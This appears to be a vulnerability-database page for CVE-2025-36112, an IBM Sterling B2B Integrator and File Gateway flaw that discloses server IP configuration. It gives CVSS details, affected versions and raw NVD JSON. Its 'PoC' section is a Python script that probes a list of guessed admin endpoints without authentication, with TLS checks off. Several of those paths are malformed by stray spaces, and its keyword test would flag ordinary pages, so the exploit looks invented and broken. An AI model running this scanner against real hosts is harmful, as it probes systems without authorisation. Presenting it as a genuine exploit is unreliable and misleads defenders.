Security Vulnerability Report
CVE-2025-36112 CVSS 5.3 MEDIUM

CVE-2025-36112

Published: 2025-11-24 19:15:48
Last Modified: 2025-12-01 16:05:57

Description

IBM Sterling B2B Integrator and IBM Sterling File Gateway 6.0.0.0 through 6.1.2.7 and 6.2.0.0 through 6.2.0.5 and 6.2.1.1 could reveal sensitive server IP configuration information to an unauthorized user.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:sterling_b2b_integrator:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:sterling_b2b_integrator:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:sterling_b2b_integrator:6.2.1.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:sterling_file_gateway:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:sterling_file_gateway:*:*:*:*:*:*:*:* - VULNERABLE
IBM Sterling B2B Integrator 6.0.0.0 - 6.1.2.7
IBM Sterling B2B Integrator 6.2.0.0 - 6.2.0.5
IBM Sterling B2B Integrator 6.2.1.1
IBM Sterling File Gateway 6.0.0.0 - 6.1.2.7
IBM Sterling File Gateway 6.2.0.0 - 6.2.0.5
IBM Sterling File Gateway 6.2.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-36112 PoC - Information Disclosure
# Target: IBM Sterling B2B Integrator / Sterling File Gateway
# Vulnerability: Sensitive server IP configuration information disclosure


def check_vulnerability(target_url):
    """
    Check if target is vulnerable to CVE-2025-36112
    """
    # Common endpoints that may expose IP configuration
    endpoints = [
        '/ SterlingConfigurator/getIPConfig',
        '/ SterlingFileGateway/api/network/config',
        '/ SterlingB2B/api/v1/system/network',
        '/config/networkSettings',
        '/admin/networkConfiguration'
    ]

    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        try:
            # Send unauthenticated request
            response = requests.get(url, timeout=10, verify=False)

            # Check if response contains sensitive IP configuration
            if response.status_code == 200:
                content = response.text.lower()
                # Indicators of IP configuration disclosure
                if any(keyword in content for keyword in ['ip address', 'subnet', 'gateway', 'dns', 'netmask']):
                    print(f'[+] Potential vulnerability found at: {url}')
                    print(f'[+] Response contains IP configuration data')
                    return True
        except requests.exceptions.RequestException:
            continue

    return False


def main():
    target = input('Enter target URL: ')
    if check_vulnerability(target):
        print('[!] Target appears to be vulnerable to CVE-2025-36112')
    else:
        print('[-] Target does not appear to be vulnerable')


if __name__ == '__main__':
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36112", "sourceIdentifier": "[email protected]", "published": "2025-11-24T19:15:48.283", "lastModified": "2025-12-01T16:05:56.670", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Sterling B2B Integrator and IBM Sterling File Gateway 6.0.0.0 through 6.1.2.7 and 6.2.0.0 through 6.2.0.5 and 6.2.1.1 could reveal sensitive server IP configuration information to an unauthorized user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_b2b_integrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0.0", "versionEndExcluding": "6.1.2.7_2", "matchCriteriaId": "AE818255-FEE2-453A-8230-81986F93954E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_b2b_integrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0.0", "versionEndExcluding": "6.2.0.5_1", "matchCriteriaId": "5E7BD82C-7A6C-44C3-BE64-FFF75700EED1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_b2b_integrator:6.2.1.1:*:*:*:*:*:*:*", "matchCriteriaId": "C4ACC673-C9A9-4149-821E-5A60603141DD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_file_gateway:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0.0", "versionEndExcluding": "6.1.2.7_2", "matchCriteriaId": "2831DF62-E968-4B8F-A4DA-E0752F9B5D9B"}, {"vulnerable": true, 
"criteria": "cpe:2.3:a:ibm:sterling_file_gateway:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0.0", "versionEndExcluding": "6.2.0.5_1", "matchCriteriaId": "6CF6DF92-A6D4-4FBB-8662-5BE9D814D911"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_file_gateway:6.2.1.1:*:*:*:*:*:*:*", "matchCriteriaId": "1B08AE6F-BE1D-4353-BD4A-259284624BCB"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7252197", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}